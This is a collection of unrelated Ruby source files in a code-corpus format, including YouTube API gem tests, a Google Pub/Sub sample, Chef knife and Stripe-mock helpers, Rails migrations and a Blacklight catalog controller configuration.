specify 'eager-loads the statistics and status of each video' do
expect(video.instance_variable_defined? :@statistics_set).to be true
expect(video.instance_variable_defined? :@status).to be true
end
end
describe '.includes(:content_details)' do
let(:video) { channel.videos.includes(:content_details).first }
specify 'eager-loads the statistics of each video' do
expect(video.instance_variable_defined? :@content_detail).to be true
end
end
describe '.includes(:category)' do
let(:video) { channel.videos.includes(:category, :status).first }
specify 'eager-loads the category (id and title) of each video' do
expect(video.instance_variable_defined? :@snippet).to be true
expect(video.instance_variable_defined? :@video_category).to be true
end
end
describe 'when the channel has more than 500 videos' do
let(:id) { 'UC0v-tlzsn0QZwJnkiaUSJVQ' }
specify 'the estimated and actual number of videos can be retrieved' do
# @note: in principle, the following three counters should match, but
# in reality +video_count+ and +size+ are only approximations.
expect(channel.video_count).to be > 500
expect(channel.videos.size).to be > 500
end
end
end
describe '.playlists' do
describe '.includes(:content_details)' do
let(:playlist) { channel.playlists.includes(:content_details).first }
specify 'eager-loads the content details of each playlist' do
expect(playlist.instance_variable_defined? :@content_detail).to be true
end
end
end
it { expect(channel.playlists.first).to be_a Yt::Playlist }
it { expect{channel.delete_playlists}.to raise_error Yt::Errors::RequestError }
describe '.related_playlists' do
let(:related_playlists) { channel.related_playlists }
specify 'returns the list of associated playlist (Liked Videos, Uploads, ...)' do
expect(related_playlists.first).to be_a Yt::Playlist
end
specify 'includes public related playlists (such as Liked Videos)' do
uploads = related_playlists.select{|p| p.title.starts_with? 'Uploads'}
expect(uploads).not_to be_empty
end
specify 'does not includes private playlists (such as Watch Later)' do
watch_later = related_playlists.select{|p| p.title.starts_with? 'Watch'}
expect(watch_later).to be_empty
end
end
specify 'with a public list of subscriptions' do
expect(channel.subscribed_channels.first).to be_a Yt::Channel
end
context 'with a hidden list of subscriptions' do
let(:id) { 'UCG0hw7n_v0sr8MXgb6oel6w' }
it { expect{channel.subscribed_channels.size}.to raise_error Yt::Errors::Forbidden }
end
# NOTE: These tests are slow because we *must* wait some seconds between
# subscribing and unsubscribing to a channel, otherwise YouTube will show
# wrong (cached) data, such as a user is subscribed when he is not.
context 'that I am not subscribed to', :slow do
let(:id) { 'UCCj956IF62FbT7Gouszaj9w' }
before { channel.throttle_subscriptions }
it { expect(channel.subscribed?).to be false }
it { expect(channel.unsubscribe).to be_falsey }
it { expect{channel.unsubscribe!}.to raise_error Yt::Errors::RequestError }
context 'when I subscribe' do
before { channel.subscribe }
after { channel.unsubscribe }
it { expect(channel.subscribed?).to be true }
it { expect(channel.unsubscribe!).to be_truthy }
end
end
context 'that I am subscribed to', :slow do
let(:id) { 'UCxO1tY8h1AhOz0T4ENwmpow' }
before { channel.throttle_subscriptions }
it { expect(channel.subscribed?).to be true }
# NOTE: These tests are commented out because YouTube randomly changed the
# behavior of the API without changing the documentation, so subscribing
# to a channel you are already subscribed to does not raise an error
# anymore.
# it { expect(channel.subscribe).to be_falsey }
# it { expect{channel.subscribe!}.to raise_error Yt::Errors::RequestError }
context 'when I unsubscribe' do
before { channel.unsubscribe }
after { channel.subscribe }
it { expect(channel.subscribed?).to be false }
it { expect(channel.subscribe!).to be_truthy }
end
end
end
context 'given my own channel' do
let(:id) { $account.channel.id }
let(:title) { 'Yt Test <title>' }
let(:description) { 'Yt Test <description>' }
let(:tags) { ['Yt Test Tag 1', 'Yt Test <Tag> 2'] }
let(:privacy_status) { 'unlisted' }
let(:params) { {title: title, description: description, tags: tags, privacy_status: privacy_status} }
specify 'subscriptions can be listed (hidden or public)' do
expect(channel.subscriptions.size).to be
end
describe 'playlists can be deleted' do
let(:title) { "Yt Test Delete All Playlists #{rand}" }
before { $account.create_playlist params }
it { expect(channel.delete_playlists title: %r{#{params[:title]}}).to eq [true] }
it { expect(channel.delete_playlists params).to eq [true] }
it { expect{channel.delete_playlists params}.to change{sleep 1; channel.playlists.count}.by(-1) }
end
# Can't subscribe to your own channel.
it { expect{channel.subscribe!}.to raise_error Yt::Errors::RequestError }
it { expect(channel.subscribe).to be_falsey }
it 'returns valid reports for channel-related metrics' do
# Some reports are only available to Content Owners.
# See content owner test for more details about what the methods return.
expect{channel.views}.not_to raise_error
expect{channel.comments}.not_to raise_error
expect{channel.likes}.not_to raise_error
expect{channel.dislikes}.not_to raise_error
expect{channel.shares}.not_to raise_error
expect{channel.subscribers_gained}.not_to raise_error
expect{channel.subscribers_lost}.not_to raise_error
expect{channel.videos_added_to_playlists}.not_to raise_error
expect{channel.videos_removed_from_playlists}.not_to raise_error
expect{channel.estimated_minutes_watched}.not_to raise_error
expect{channel.average_view_duration}.not_to raise_error
expect{channel.average_view_percentage}.not_to raise_error
expect{channel.annotation_clicks}.not_to raise_error
expect{channel.annotation_click_through_rate}.not_to raise_error
expect{channel.annotation_close_rate}.not_to raise_error
expect{channel.card_impressions}.not_to raise_error
expect{channel.card_clicks}.not_to raise_error
expect{channel.card_click_rate}.not_to raise_error
expect{channel.card_teaser_impressions}.not_to raise_error
expect{channel.card_teaser_clicks}.not_to raise_error
expect{channel.card_teaser_click_rate}.not_to raise_error
expect{channel.viewer_percentage}.not_to raise_error
expect{channel.estimated_revenue}.to raise_error Yt::Errors::Unauthorized
expect{channel.ad_impressions}.to raise_error Yt::Errors::Unauthorized
expect{channel.monetized_playbacks}.to raise_error Yt::Errors::Unauthorized
expect{channel.playback_based_cpm}.to raise_error Yt::Errors::Unauthorized
end
end
context 'given an unknown channel' do
let(:id) { 'not-a-channel-id' }
it { expect{channel.snippet}.to raise_error Yt::Errors::NoItems }
it { expect{channel.status}.to raise_error Yt::Errors::NoItems }
it { expect{channel.statistics_set}.to raise_error Yt::Errors::NoItems }
it { expect{channel.subscribe}.to raise_error Yt::Errors::RequestError }
describe 'starting with UC' do
let(:id) { 'UC-not-a-channel-id' }
# NOTE: This test is just a reflection of YouTube irrational behavior of
# returns 0 results if the name of an unknown channel starts with UC, but
# returning 100,000 results otherwise (ignoring the channel filter).
it { expect(channel.videos.count).to be_zero }
it { expect(channel.videos.size).to be_zero }
end
end
end
| 40.670782 | 105 | 0.691187 |
edaecc05f1f94bac7ceb608ee99bd033c1319704 | 1,538 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START pubsub_v1_generated_Subscriber_ListSubscriptions_sync]
require "google/cloud/pubsub/v1"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::PubSub::V1::Subscriber::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::PubSub::V1::ListSubscriptionsRequest.new
# Call the list_subscriptions method.
result = client.list_subscriptions request
# The returned object is of type Gapic::PagedEnumerable. You can
# iterate over all elements by calling #each, and the enumerable
# will lazily make API calls to fetch subsequent pages. Other
# methods are also available for managing paging directly.
result.each do |response|
# Each element is of type ::Google::Cloud::PubSub::V1::Subscription.
p response
end
# [END pubsub_v1_generated_Subscriber_ListSubscriptions_sync]
| 38.45 | 74 | 0.780884 |
bf103678a870fc499b17ebf4c2f1c1f44dc6567e | 1,721 | #
# Author:: Tyler Cloke ([email protected])
# Copyright:: Copyright (c) 2015 Chef Software, Inc
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef/knife"
require "chef/knife/key_create_base"
class Chef
class Knife
# Implements knife user key create using Chef::Knife::KeyCreate
# as a service class.
#
# @author Tyler Cloke
#
# @attr_reader [String] actor the name of the client that this key is for
class ClientKeyCreate < Knife
include Chef::Knife::KeyCreateBase
attr_reader :actor
def initialize(argv=[])
super(argv)
@service_object = nil
end
def run
apply_params!(@name_args)
service_object.run
end
def actor_field_name
"client"
end
def service_object
@service_object ||= Chef::Knife::KeyCreate.new(@actor, actor_field_name, ui, config)
end
def actor_missing_error
"You must specify a client name"
end
def apply_params!(params)
@actor = params[0]
if @actor.nil?
show_usage
ui.fatal(actor_missing_error)
exit 1
end
end
end
end
end
| 25.308824 | 92 | 0.661243 |
e8e1740ca5a7f76fc5842ae40bee3aa9bcec7f35 | 473 | #
# To run:
# clear; ruby extconf.rb ; make; ruby RubyTestSharedMemoryModuleGPIO2.rb
#
require_relative 'SharedMemoryGPIO2'
#WriteDataToSharedMemory("abcd12345")
smgpio2 = SharedMemoryGpio2.new
fromSharedMem = smgpio2.GetData()
puts "Content of fromSharedMem=#{fromSharedMem}"
# newData = "abcd12345"
# SharedMemoryGpio2.WriteData("This is a ruby test memory sharing.")
# fromSharedMem = SharedMemoryGpio2.GetData()
# puts "NEW Content of fromSharedMem=#{fromSharedMem}"
| 29.5625 | 72 | 0.784355 |
6106c4ff78070cb0860073aa6ac4da5432ae4cab | 421 | require 'digest/md5'
class MerbSlicePayson::Response
attr_reader :paysonref
def initialize(params, key = nil)
@ok_url = params['OkURL']
@paysonref = params['Paysonref']
@md5 = params['MD5']
@ref_nr = params['RefNr']
@fee = params['Fee']
@key = key || Payson[:key]
end
def valid?
@md5 == Digest::MD5.hexdigest(@ok_url + @paysonref + @key)
end
end
| 18.304348 | 62 | 0.574822 |
5d5f41faa0bb9ccca87fff4f9d69dc5c5ed3ba36 | 306 | class MigrateCalculatedAvailabilityValues < ActiveRecord::Migration
def up
Programmer.all.each do |programmer|
programmer.calculate_calculated_availability
# Do not force a successful save, as incomplete programmers are not valid
programmer.save
end
end
def down
end
end
| 23.538462 | 79 | 0.751634 |
1c0f303bca0e83e7f48b071ee982ee0fa7f34e43 | 444 | module Faye
class Transport::Local < Transport
def self.usable?(dispatcher, endpoint, &callback)
callback.call(Server === endpoint)
end
def batching?
false
end
def request(messages)
EventMachine.next_tick do
@endpoint.process(messages, nil) do |replies|
receive(Faye.copy_object(replies))
end
end
end
end
Transport.register 'in-process', Transport::Local
end
| 18.5 | 53 | 0.641892 |
7a964e118baa57708d4c4a74d920c03df57faf74 | 248 | require "openxml/drawingml/properties/paragraph_properties"
module OpenXml
module DrawingML
module Properties
class Level3ParagraphProperties < ParagraphProperties
namespace :a
tag :lvl3pPr
end
end
end
end
| 17.714286 | 59 | 0.717742 |
0839ceb7e6fe3c8e63c0710c3f8542c95d36257a | 1,078 | module SixSaferpay
module SixTransaction
class AssertRefundResponse
attr_accessor(:response_header,
:transaction_id,
:order_id,
:status,
:date
)
def initialize(response_header:,
transaction_id: ,
order_id: nil,
status: ,
date: )
@response_header = SixSaferpay::ResponseHeader.new(**response_header.to_h) if response_header
@transaction_id = transaction_id
@order_id = order_id
@status = status
@date = date
end
def to_hash
hash = Hash.new
hash.merge!(response_header: @response_header.to_h) if @response_header
hash.merge!(transaction_id: @transaction_id) if @transaction_id
hash.merge!(order_id: @order_id) if @order_id
hash.merge!(status: @status) if @status
hash.merge!(date: @date) if @date
hash
end
alias_method :to_h, :to_hash
end
end
end
| 26.95 | 101 | 0.548237 |
01c740b3afdaf92112db7b0dd8d5107042e663ac | 3,547 | # frozen_string_literal: true
require "rails_helper"
describe "api/v1/plans/_show.json.jbuilder" do
before(:each) do
@plan = create(:plan)
@data_contact = create(:contributor, data_curation: true, plan: @plan)
@pi = create(:contributor, investigation: true, plan: @plan)
@plan.contributors = [@data_contact, @pi]
create(:identifier, identifiable: @plan)
@plan.reload
end
describe "includes all of the DMP attributes" do
before(:each) do
render partial: "api/v1/plans/show", locals: { plan: @plan }
@json = JSON.parse(rendered).with_indifferent_access
end
it "includes the :title" do
expect(@json[:title]).to eql(@plan.title)
end
it "includes the :description" do
expect(@json[:description]).to eql(@plan.description)
end
it "includes the :language" do
expected = Api::V1::LanguagePresenter.three_char_code(
lang: LocaleService.default_locale
)
expect(@json[:language]).to eql(expected)
end
it "includes the :created" do
expect(@json[:created]).to eql(@plan.created_at.to_formatted_s(:iso8601))
end
it "includes the :modified" do
expect(@json[:modified]).to eql(@plan.updated_at.to_formatted_s(:iso8601))
end
it "includes :ethical_issues" do
expected = Api::V1::ConversionService.boolean_to_yes_no_unknown(@plan.ethical_issues)
expect(@json[:ethical_issues_exist]).to eql(expected)
end
it "includes :ethical_issues_description" do
expect(@json[:ethical_issues_description]).to eql(@plan.ethical_issues_description)
end
it "includes :ethical_issues_report" do
expect(@json[:ethical_issues_report]).to eql(@plan.ethical_issues_report)
end
it "returns the URL of the plan as the :dmp_id if no DOI is defined" do
expected = Rails.application.routes.url_helpers.api_v1_plan_url(@plan)
expect(@json[:dmp_id][:type]).to eql("url")
expect(@json[:dmp_id][:identifier]).to eql(expected)
end
it "includes the :contact" do
expect(@json[:contact][:mbox]).to eql(@data_contact.email)
end
it "includes the :contributors" do
emails = @json[:contributor].collect { |c| c[:mbox] }
expect(emails.include?(@pi.email)).to eql(true)
end
# TODO: make sure this is working once the new Cost theme and Currency
# question type have been implemented
it "includes the :cost" do
expect(@json[:cost]).to eql(nil)
end
it "includes the :project" do
expect(@json[:project].length).to eql(1)
end
it "includes the :dataset" do
expect(@json[:dataset].length).to eql(1)
end
it "includes the :dmproadmap_template" do
expect(@json[:dmproadmap_template].present?).to eql(true)
end
it "includes the :dmproadmap_template - :id and :title" do
expect(@json[:dmproadmap_template][:id]).to eql(@plan.template.id)
expect(@json[:dmproadmap_template][:title]).to eql(@plan.template.title)
end
end
describe "when the system mints DOIs" do
before(:each) do
Rails.configuration.x.allow_doi_minting = true
@doi = create(:identifier, value: "10.9999/123abc.zy/x23", identifiable: @plan)
@plan.reload
render partial: "api/v1/plans/show", locals: { plan: @plan }
@json = JSON.parse(rendered).with_indifferent_access
end
it "returns the DOI for the :dmp_id if one is present" do
expect(@json[:dmp_id][:type]).to eql("doi")
expect(@json[:dmp_id][:identifier]).to eql(@doi.value)
end
end
end
| 34.105769 | 91 | 0.670426 |
e827f69faa0b839c3d9be4d880a793bb292498ee | 104 | class DebugMigration < ActiveRecord::Migration[4.2]
def change
puts "RUNNING MIGRATION"
end
end
| 17.333333 | 51 | 0.740385 |
21e53e1efa4742e652301c0cf1740c6a58d31c5e | 355 | module Ctgov
class OutcomeAnalysis < Ctgov::StudyRelationship
belongs_to :outcome, inverse_of: :outcome_analyses, autosave: true
has_many :outcome_analysis_groups, inverse_of: :outcome_analysis, autosave: true
has_many :result_groups, :through => :outcome_analysis_groups
def groups
outcome_analysis_groups
end
end
end
| 27.307692 | 86 | 0.757746 |
2683884486ab4d91790cf6dce26cc054c3ec12ee | 4,373 | module StripeMock
module TestStrategies
class Base
def list_skus(limit)
Stripe::SKU.list(limit: limit)
end
def create_sku(params={})
Stripe::SKU.create create_sku_params(params)
end
def create_sku_params(params={})
currency = params[:currency] || StripeMock.default_currency
{
:id => 'stripe_mock_default_sku_id',
:currency => currency,
:inventory => {
type: 'infinite'
},
:price => 1234,
:product => 'stripe_mock_default_product_id'
}.merge(params)
end
def list_products(limit)
Stripe::Product.list(limit: limit)
end
def create_product(params={})
Stripe::Product.create create_product_params(params)
end
def create_product_params(params={})
{
:id => 'stripe_mock_default_product_id',
:name => 'Default Product',
:type => 'service'
}.merge(params)
end
def retrieve_product(product_id)
Stripe::Product.retrieve(product_id)
end
def list_plans(limit)
Stripe::Plan.list(limit: limit)
end
def create_plan(params={})
Stripe::Plan.create create_plan_params(params)
end
def create_plan_params(params={})
{
:id => 'stripe_mock_default_plan_id',
:interval => 'month',
:currency => StripeMock.default_currency,
:product => nil, # need to override yourself to pass validations
:amount => 1337
}.merge(params)
end
def list_subscriptions(limit)
Stripe::Subscription.list(limit: limit)
end
def generate_card_token(card_params={})
card_data = { :number => "4242424242424242", :exp_month => 9, :exp_year => (Time.now.year + 5), :cvc => "999", :tokenization_method => nil }
card = StripeMock::Util.card_merge(card_data, card_params)
card[:fingerprint] = StripeMock::Util.fingerprint(card[:number]) if StripeMock.state == 'local'
stripe_token = Stripe::Token.create(:card => card)
stripe_token.id
end
def generate_bank_token(bank_account_params={})
currency = bank_account_params[:currency] || StripeMock.default_currency
bank_account = {
:country => "US",
:currency => currency,
:account_holder_name => "Jane Austen",
:account_holder_type => "individual",
:routing_number => "110000000",
:account_number => "000123456789"
}.merge(bank_account_params)
bank_account[:fingerprint] = StripeMock::Util.fingerprint(bank_account[:account_number]) if StripeMock.state == 'local'
stripe_token = Stripe::Token.create(:bank_account => bank_account)
stripe_token.id
end
def create_coupon_params(params = {})
currency = params[:currency] || StripeMock.default_currency
{
id: '10BUCKS',
amount_off: 1000,
currency: currency,
max_redemptions: 100,
metadata: {
created_by: 'admin_acct_1'
},
duration: 'once'
}.merge(params)
end
def create_coupon_percent_of_params(params = {})
{
id: '25PERCENT',
percent_off: 25,
redeem_by: nil,
duration_in_months: 3,
duration: :repeating
}.merge(params)
end
def create_checkout_session_params(params = {})
{
payment_method_types: ['card'],
line_items: [{
name: 'T-shirt',
quantity: 1,
amount: 500,
currency: 'usd',
}],
}.merge(params)
end
def create_coupon(params = {})
Stripe::Coupon.create create_coupon_params(params)
end
def create_checkout_session(params = {})
Stripe::Checkout::Session.create create_checkout_session_params(params)
end
def delete_all_coupons
coupons = Stripe::Coupon.list
coupons.data.map(&:delete) if coupons.data.count > 0
end
def prepare_card_error
StripeMock.prepare_card_error(:card_error, :new_customer) if StripeMock.state == 'local'
end
end
end
end
| 28.581699 | 148 | 0.57512 |
7a87661e14a23dc098d38982b95aa8d6289e9f20 | 693 | module ErrorMessagesHelper
# Render error messages for the given objects.
# The :message option is allowed.
def error_messages_for(*objects)
options = objects.extract_options!
options[:message] ||= I18n.t(:"activerecord.errors.message", :default => "One or more fields need to be supplied or corrected.")
messages = objects.compact.map { |o| o.errors.full_messages }.flatten
unless messages.empty?
content_tag(:div, :class => "error_messages box_radius") do
list_items = messages.map { |msg| content_tag(:li, msg.html_safe) }
content_tag(:p, options[:message].html_safe) + content_tag(:ul, list_items.join.html_safe)
end
end
end
end
| 36.473684 | 132 | 0.701299 |
3820cef88363da2d5e4ed9f832eb1581cf976944 | 124 | # frozen_string_literal: true
class Admin::BaseController < ApplicationController
before_action :authenticate_admin!
end
| 20.666667 | 51 | 0.83871 |
216420990304eaf9af5cf25955c96d3142ce21d3 | 1,900 | # frozen_string_literal: true
module Beta
module Types
module Objects
class WorkImageType < Beta::Types::Objects::Base
implements GraphQL::Relay::Node.interface
global_id_field :id
field :anikuto_id, Integer, null: true
field :work, Beta::Types::Objects::WorkType, null: true
field :facebook_og_image_url, String, null: true
field :twitter_avatar_url, String, null: true
field :twitter_mini_avatar_url, String, null: true
field :twitter_normal_avatar_url, String, null: true
field :twitter_bigger_avatar_url, String, null: true
field :recommended_image_url, String, null: true
field :internal_url, String, null: true do
argument :size, String, required: true
end
def work
Beta::RecordLoader.for(Work).load(object.work_id)
end
def internal_url(size:)
return unless context[:doorkeeper_token].owner.role.admin?
return '' if object.blank?
ann_image_url object, :image, size: size
end
def facebook_og_image_url
return '' if object.blank?
object.work.facebook_og_image_url
end
def twitter_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url
end
def twitter_mini_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:mini)
end
def twitter_normal_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:normal)
end
def twitter_bigger_avatar_url
return '' if object.blank?
object.work.twitter_avatar_url(:bigger)
end
def recommended_image_url
return '' if object.blank?
object.work.recommended_image_url
end
end
end
end
end
| 25.675676 | 68 | 0.626316 |
bf4bd053e4d262bebeec3fa79ac373f45828f7e8 | 599 | # -*- encoding : utf-8 -*-
class UserObserver < ActiveRecord::Observer
observe :user
def before_validation(user)
user.password = SecureRandom.hex(4) unless user.password || user.persisted?
end
def after_initialize(user)
if not user.name.nil?
user.name.force_encoding(Encoding::UTF_8)
end
end
def after_create(user)
if user.has_facebook_authentication?
Notification.create_notification_once(:temporary_password,
user,
{id: user.id},
password: user.password)
end
end
def before_save(user)
user.fix_twitter_user
end
end
| 21.392857 | 79 | 0.691152 |
9166e33401464a0b48d8579bf677ff63d7485e61 | 1,044 | class CLI
def call
welcome
puts "************************************************************"
title_list
get_user_input
display_articles
done
end
def welcome
puts "Welcome informed citizen!"
end
def title_list
Scraper.scrape
AllTop.all.each_with_index do |alltop_obj, i|
puts "#{i+1}. #{alltop_obj.news_name}"
end
end
def get_user_input
input = nil
puts "Where do you wish to go? Select a number or type exit:"
until input == "exit" do
input = gets.strip.to_i
@selected_index = input - 1
if input.between?(1,14)
display_articles
get_user_input
else
done
end
end
end
def display_articles
alltop_obj = AllTop.all[@selected_index]
alltop_obj.articles.each do |article_obj|
puts "************************************************************"
puts "Article Headline: #{article_obj.title}\n\n "
puts "Teaser: #{article_obj.quote}\n\n "
puts "Link for Further Info: #{article_obj.article_url}"
end
end
def done
puts "That's enough news for now. Until next time!"
exit
end
end
| 17.694915 | 69 | 0.627395 |
3814c8e6509ea523dca4a887d9071e85933a7ab4 | 2,538 | # frozen_string_literal: true
require "secp256k1"
module CKB
module Utils
def self.hex_to_bin(hex)
hex = hex[2..-1] if hex.start_with?("0x")
[hex].pack("H*")
end
def self.bin_to_hex(bin)
bin.unpack1("H*")
end
def self.bin_to_prefix_hex(bin)
"0x#{bin_to_hex(bin)}"
end
def self.extract_pubkey_bin(privkey_bin)
Secp256k1::PrivateKey.new(privkey: privkey_bin).pubkey.serialize
end
def self.json_script_to_type_hash(script)
blake2b = CKB::Blake2b.new
blake2b << hex_to_bin(script[:binary_hash]) if script[:binary_hash]
args = script[:args] || []
args.each do |arg|
blake2b << arg
end
bin_to_prefix_hex(blake2b.digest)
end
def self.sign_sighash_all_inputs(inputs, outputs, privkey)
blake2b = CKB::Blake2b.new
sighash_type = 0x1.to_s
blake2b.update(sighash_type)
inputs.each do |input|
previous_output = input[:previous_output]
blake2b.update(hex_to_bin(previous_output[:hash]))
blake2b.update(previous_output[:index].to_s)
end
outputs.each do |output|
blake2b.update(output[:capacity].to_s)
blake2b.update(hex_to_bin(json_script_to_type_hash(output[:lock])))
next unless output[:type]
blake2b.update(
hex_to_bin(
json_script_to_type_hash(output[:type])
)
)
end
key = Secp256k1::PrivateKey.new(privkey: privkey)
signature_bin = key.ecdsa_serialize(
key.ecdsa_sign(blake2b.digest, raw: true)
)
signature_hex = bin_to_hex(signature_bin)
inputs.map do |input|
args = input[:args] + [signature_hex, sighash_type]
input.merge(args: args)
end
end
# In Ruby, bytes are represented using String,
# since JSON has no native byte arrays,
# CKB convention bytes passed with a "0x" prefix hex encoding,
# hence we have to do type conversions here.
def self.normalize_tx_for_json!(transaction)
transaction[:inputs].each do |input|
input[:args] = input[:args].map { |arg| bin_to_prefix_hex(arg) }
end
transaction[:outputs].each do |output|
output[:data] = bin_to_prefix_hex(output[:data])
lock = output[:lock]
lock[:args] = lock[:args].map { |arg| bin_to_prefix_hex(arg) }
next unless output[:type]
type = output[:type]
type[:args] = type[:args].map { |arg| bin_to_prefix_hex(arg) }
end
transaction
end
end
end
| 28.516854 | 75 | 0.633964 |
e95d2eb2ba82f867d88961de49493d48d183820b | 161 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Pmacctstats::Application
| 32.2 | 67 | 0.776398 |
ab2f55ef0de5b09f80d8fc7ab06e666d5c43fac4 | 1,404 | module Commissioner
class ToolsController < ApplicationController
before_action :commissioner_required
def index
end
# NEW SEASON
# Creates new players, deletes inactive players and players not in league, updates player if new team, adds cbs data
def update_available_players
FdPlayer.new.update_all_player_info
flash[:notice] = "Players updated."
redirect_to commissioner_path
end
# Updates data for TLFL teams and Team DSTs
def update_team_data # link to button on tools page
task = FdTeam.new
task.update_team_dst_data
task.update_tlfl_team_data
flash[:notice] = "Team data updated."
redirect_to commissioner_path
end
# Checks if database name matches same as cbs - if different player, manually change cbs and esb IDs
def check_cbs_id
@hash = {}
cbs_resp = Faraday.get "http://api.cbssports.com/fantasy/players/list?version=3.0&SPORT=football&response_format=json"
cbs_json = JSON.parse(cbs_resp.body)
players = Player.all
cbs_json["body"]["players"].each do |cbs_player|
players.each do |player|
if player.cbs_id == cbs_player["id"].to_i && player.full_name != cbs_player["fullname"]
@hash[player.full_name] = cbs_player["fullname"]
end
end
end
end
end
end | 32.651163 | 125 | 0.660969 |
4a50a54c3e5aed41e0b3de74d5c5bc445abe93b6 | 26 | module HangoutsHelper
end
| 8.666667 | 21 | 0.884615 |
61c21d7a7d349a4c6e5e67b0f9cc905f4c681966 | 3,032 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migration and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.before(:suite) do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with(:truncation)
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 39.894737 | 86 | 0.746042 |
7a0c7fe27861ea5d37ff627ecfbf050c785ef39c | 245 | class CreateUsers < ActiveRecord::Migration[6.0]
def change
create_table :users do |t|
t.string :username
t.string :password_digest
t.string :email
t.integer :admin, default: 0
t.timestamps
end
end
end
| 18.846154 | 48 | 0.644898 |
8756a71c4def18e0703b922ed6ed95e47ce24918 | 177 | class SolvemediaConfigGenerator < Rails::Generator::Base
def manifest
record do |m|
m.file "solvemedia_config.yml", "config/solvemedia_config.yml"
end
end
end
| 22.125 | 68 | 0.723164 |
7a160ef513fc1a5d1d6ed6923dcd14bb5cb07415 | 321 | class Food < ApplicationRecord
belongs_to :user
validates :name, presence: true
validates :measurement_unit, presence: true
validates :user_id, presence: true
validates :price, numericality: { greater_than_or_equal_to: 1, only_integer: true }
def name_with_unit
"#{name} (#{measurement_unit})"
end
end
| 26.75 | 85 | 0.747664 |
6186bd88ef46d6a7be675ddcd7ff0a326d59dc35 | 19,155 | # frozen_string_literal: true
class CatalogController < ApplicationController
include BlacklightRangeLimit::ControllerOverride
include Blacklight::Catalog
include Arclight::Catalog
include Arclight::FieldConfigHelpers
configure_blacklight do |config|
## Class for sending and receiving requests from a search index
# config.repository_class = Blacklight::Solr::Repository
#
## Class for converting Blacklight's url parameters to into request parameters for the search index
# config.search_builder_class = ::SearchBuilder
#
## Model that maps search index responses to the blacklight response model
# config.response_model = Blacklight::Solr::Response
## Default parameters to send to solr for all search-like requests. See also SearchBuilder#processed_parameters
config.default_solr_params = {
rows: 10
}
# solr path which will be added to solr base url before the other solr params.
# config.solr_path = 'select'
# items to show per page, each number in the array represent another option to choose from.
# config.per_page = [10,20,50,100]
## Default parameters to send on single-document requests to Solr. These settings are the Blacklight defaults (see SearchHelper#solr_doc_params) or
## parameters included in the Blacklight-jetty document requestHandler.
#
# config.default_document_solr_params = {
# qt: 'document',
# ## These are hard-coded in the blacklight 'document' requestHandler
# # fl: '*',
# # rows: 1,
# # q: '{!term f=id v=$id}'
# }
# solr field configuration for search results/index views
config.index.title_field = 'normalized_title_ssm'
config.index.display_type_field = 'level_ssm'
# config.index.thumbnail_field = 'thumbnail_path_ss'
# solr field configuration for document/show views
# config.show.title_field = 'title_display'
config.show.display_type_field = 'level_ssm'
# config.show.thumbnail_field = 'thumbnail_path_ss'
config.add_results_document_tool(:bookmark, partial: 'bookmark_control', if: :render_bookmarks_control?)
config.add_results_collection_tool(:sort_widget)
config.add_results_collection_tool(:per_page_widget)
config.add_results_collection_tool(:view_type_group)
config.add_show_tools_partial(:bookmark, partial: 'bookmark_control', if: :render_bookmarks_control?)
config.add_show_tools_partial(:email, callback: :email_action, validator: :validate_email_params)
